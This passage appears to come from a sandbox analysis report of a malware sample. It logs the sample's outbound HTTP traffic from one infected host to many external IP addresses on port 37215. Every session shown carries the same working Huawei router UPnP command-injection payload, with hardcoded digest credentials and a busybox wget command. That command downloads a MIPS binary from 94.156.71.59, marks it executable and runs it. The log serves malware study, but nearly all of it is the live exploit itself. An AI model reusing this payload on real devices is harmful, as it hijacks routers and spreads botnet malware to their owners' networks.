37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1077192.168.2.1336168197.88.35.9837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.660973072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1078192.168.2.1360430197.218.112.9937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.663570881 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1079192.168.2.133529841.250.33.18937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.666141033 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1080192.168.2.1333412156.155.132.24537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.669423103 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1081192.168.2.134870641.47.85.3737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.672777891 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1082192.168.2.134161641.232.166.937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.676304102 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1083192.168.2.134565041.25.255.17737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.680020094 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1084192.168.2.133552841.169.85.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.683582067 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1085192.168.2.1347264156.97.237.14037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.686953068 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1086192.168.2.1356998197.164.26.23237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.691395998 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1087192.168.2.1355182197.100.229.4737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.695947886 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
